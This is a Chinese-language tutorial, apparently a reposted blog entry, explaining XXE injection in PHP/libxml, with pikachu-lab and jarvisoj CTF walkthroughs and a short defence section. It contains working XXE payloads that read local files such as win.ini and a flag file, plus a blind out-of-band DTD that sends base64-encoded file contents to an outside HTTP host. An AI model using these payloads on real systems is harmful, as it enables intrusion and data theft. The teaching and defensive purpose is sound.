zoukankan      html  css  js  c++  java

  • XXE

    一.XXE的原理

    运维人员使用了低版本php,libxml低于2.9.1就会造成XXE或者程序员设置了libxml_disable_entity_loader(FALSE); 

    要点:libxml2.9.1及以后,默认不解析外部实体。测试的时候windows下使用的是php5.2(libxml Version 2.7.7 ), php5.3(libxml Version 2.7.8)。Linux中需要将libxml低于libxml2.9.1的版本编译到PHP中,可以使用phpinfo()查看libxml的版本信息。

    如图,libxml低于2.9.1,说明存在XXE漏洞

    二.XXE的定义

    XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。

    三.XXE的文档结构

    <?xml version=”1.0” encoding="gb2312" encoding=”UTF-8”?>   

    xml声明、版本(gb2312表示中国)、编码(UTF-8指的是万能编码,它支持各个国家的语言)

    <!DOCTYPE root system "http://www.XXXX.com/file"[ ...

    定义DTD文件,格式为:root指定根节点名称,system声明要使用的外部DTD文件路径,后面加文件URL,注意[]包裹。

    <!ELEMENT root (other)> ...

    元素声明,声明xml中包含的元素,声明中需要指定元素名称(root、other等)和元素类别、内容等

    四.DTD的基础知识

    基本的PAYLOAD结构:

    DTD实体声明

    内部实体声明

    示例:

    <!DOCTYPE foo [<!ELEMENT foo ANY >
    <!ENTITY xxe "oldboyedu.com">]>
    <foo>&xxe;</foo>

    外部实体声明

    任何语言都支持file、http、ftp协议

    示例:

    <!DOCTYPE foo [<!ELEMENT foo ANY >
    
<!ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >]>
    
<foo>&xxe;</foo>

    参数实体声明

    示例:

    <!DOCTYPE foo [<!ELEMENT foo ANY >
    
<!ENTITY  % xxe SYSTEM "http://192.168.0.105:8080/evil.dtd" >
    
%xxe;]>
    
<foo>&evil;</foo>

    五.XXE攻击

    有回显情况

    示例:

    <!DOCTYPE foo [<!ELEMENT foo ANY >
    <!ENTITY  % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
    %xxe;]>
    <foo>&evil;</foo>

    无回显情况

    建立*.dtd

    示例:

    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
    <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.0.105:8080?p=%file;'>">

    定义DTD文件上传到服务器,然后调用就可以了

    xml调用

    示例:

    <!DOCTYPE convert [ 
    <!ENTITY % remote SYSTEM "http://ip/test.dtd">
    %remote;%int;%send;
    ]>

     把显示在日志里的结果通过burp suite解密

     

    六.XXE漏洞利用及相关扩展知识

    pikachu  xxe代码

    <?xml version = "1.0"?>

    <!DOCTYPE ANY [

        <!ENTITY f SYSTEM "file:///C://1.txt">

    ]>

    <x>&f;</x>

    示例:

     打开pikachu,通过Burp suite 抓包(1.挖XXE漏洞首先找有参数的地方2.看他的accept头允许哪种语言,发现xml说明允许xml提交语言3.可以在参数出随意输入值(因为参数没有过滤,其次libxml低于2.9)

    还有一种方法就是看xml后面是否是XXE编码

    找到漏洞后,输入代码:<?xml version = "1.0"?> <!DOCTYPE ANY [     <!ENTITY f SYSTEM "file:///C://2.txt"> ]> <x>&f;</x>

     

    jarvisoj上的一道题目API调用

    这道题的题目说明是 请设法获得目标机器/home/ctf/flag.txt中的flag值。

    进入题目 http://web.jarvisoj.com:9882/ 发现一个输入框,我们对其进行抓包

     

     

     把json改为xml,把最后一行复制为

    <?xml version = "1.0"?>
    <!DOCTYPE xxe [
        <!ENTITY file SYSTEM "file:///home/ctf/flag.txt">
    ]>
    <x>&file;</x>

    七.XXE漏洞修复与防御

    复制一行代码

    libxml_disable_entity_loader(true);

    升级为高版本

    手动黑名单过滤

    过滤关键词:<!DOCTYPE<!ENTITY SYSTEMPUBLIC
  • 相关阅读:
    Flume实现写入es
    JMeter创建上传文件脚本
    JQuery的dataTable实现分页
    Dubbo服务发布机制-源码学习
    spring容器启动过程(Spring源码阅读)
    Hadoop学习笔记一(HDFS架构)
    hbase修改表TTL
    hive复制表
    提交docker镜像到远程仓库
    centos7 安装ssh
  • 原文地址:https://www.cnblogs.com/2001-04-14-03-21/p/14254794.html
Copyright © 2011-2022 走看看